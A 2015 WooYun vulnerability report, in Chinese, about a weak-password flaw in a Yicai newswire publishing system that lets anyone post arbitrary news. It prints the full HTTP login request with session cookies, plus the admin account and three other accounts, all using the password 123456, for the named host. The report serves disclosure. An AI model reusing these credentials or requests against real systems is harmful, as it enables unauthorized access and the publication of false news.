当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155371

漏洞标题:第一财经某系统设置不当(发布推送任意新闻)

相关厂商:第一财经

漏洞作者: 路人甲

提交时间:2015-11-24 11:04

修复时间:2015-11-29 11:06

公开时间:2015-11-29 11:06

漏洞类型:应用配置错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

老婆摸摸七个月的肚子对我说:该给你孩子娶个名了。
我说:你名字里面有个香,你是我最珍爱的人,就叫珍香吧
老婆啪就是一嘴巴:提莫的忘了你姓史吗?

详细说明:

POST /Login.aspx HTTP/1.1
Host: newswire.yicai.com
Proxy-Connection: keep-alive
Content-Length: 338
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://newswire.yicai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
Content-Type: application/x-www-form-urlencoded
Referer: http://newswire.yicai.com/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: yicai_seccode=e176DQnQRSbJvjQOst2eKw8YM4bRgq8Fc83KhyMTwVD2; _gat=1; _ga=GA1.2.689402698.1448282930; __utmt=1; __utmt_~1=1; _gscu_1265232364=0.6.0.7%7C4828315139m8chgz17%7C1448311951394%7C8%7C1%7C0%7C0; _gscs_1265232364=4828315139d30nv117%7C3%7C1448311951394; _gscbrs_1265232364=1; _gscu_1143037630=0.6.0.7%7C48283151651pnl6p17%7C1448311951651%7C8%7C1%7C0%7C0; _gscs_1143037630=48283151658tstro17%7C3%7C1448311951651; _gscbrs_1143037630=1; __utma=164348000.689402698.1448282930.1448283148.1448283148.1; __utmb=164348000.8.10.1448283148; __utmc=164348000; __utmz=164348000.1448283148.1.1.utmcsr=bing|utmccn=(organic)|utmcmd=organic|utmctr=site%3ayicai.com; ASP.NET_SessionId=n02rcqno1uzefib3szaalwf4
__VIEWSTATE=%2FwEPDwUJOTc3NzE2NTMwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUGbGlua09LBQVpc1B3ZA%3D%3D&__EVENTVALIDATION=%2FwEdAAaJLNheMGLJ7uleae9T%2FWQdDFTzKcXJqLg%2BOeJ6QAEa2jPSlu16Yx4QbiDU%2BdddK1M8kShHPfGC%2F8KwvYLx4jXzAuubA4vHjGmfKNfH5Q7MgxfsU7ZoPhQwziCDOimUK2o%3D&txtUser=admin&txtPwd=123456&linkOK.x=32&linkOK.y=23&txtInfo=

1.jpg

2.jpg

3.jpg


wangjie/123456
wangliang/123456
chenjuan/123456

漏洞证明:

POST /Login.aspx HTTP/1.1
Host: newswire.yicai.com
Proxy-Connection: keep-alive
Content-Length: 338
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://newswire.yicai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
Content-Type: application/x-www-form-urlencoded
Referer: http://newswire.yicai.com/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: yicai_seccode=e176DQnQRSbJvjQOst2eKw8YM4bRgq8Fc83KhyMTwVD2; _gat=1; _ga=GA1.2.689402698.1448282930; __utmt=1; __utmt_~1=1; _gscu_1265232364=0.6.0.7%7C4828315139m8chgz17%7C1448311951394%7C8%7C1%7C0%7C0; _gscs_1265232364=4828315139d30nv117%7C3%7C1448311951394; _gscbrs_1265232364=1; _gscu_1143037630=0.6.0.7%7C48283151651pnl6p17%7C1448311951651%7C8%7C1%7C0%7C0; _gscs_1143037630=48283151658tstro17%7C3%7C1448311951651; _gscbrs_1143037630=1; __utma=164348000.689402698.1448282930.1448283148.1448283148.1; __utmb=164348000.8.10.1448283148; __utmc=164348000; __utmz=164348000.1448283148.1.1.utmcsr=bing|utmccn=(organic)|utmcmd=organic|utmctr=site%3ayicai.com; ASP.NET_SessionId=n02rcqno1uzefib3szaalwf4
__VIEWSTATE=%2FwEPDwUJOTc3NzE2NTMwZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUGbGlua09LBQVpc1B3ZA%3D%3D&__EVENTVALIDATION=%2FwEdAAaJLNheMGLJ7uleae9T%2FWQdDFTzKcXJqLg%2BOeJ6QAEa2jPSlu16Yx4QbiDU%2BdddK1M8kShHPfGC%2F8KwvYLx4jXzAuubA4vHjGmfKNfH5Q7MgxfsU7ZoPhQwziCDOimUK2o%3D&txtUser=admin&txtPwd=123456&linkOK.x=32&linkOK.y=23&txtInfo=


1.jpg

2.jpg

3.jpg

wangjie/123456
wangliang/123456
chenjuan/123456

修复方案:

看样子会忽略。。。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-29 11:06

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无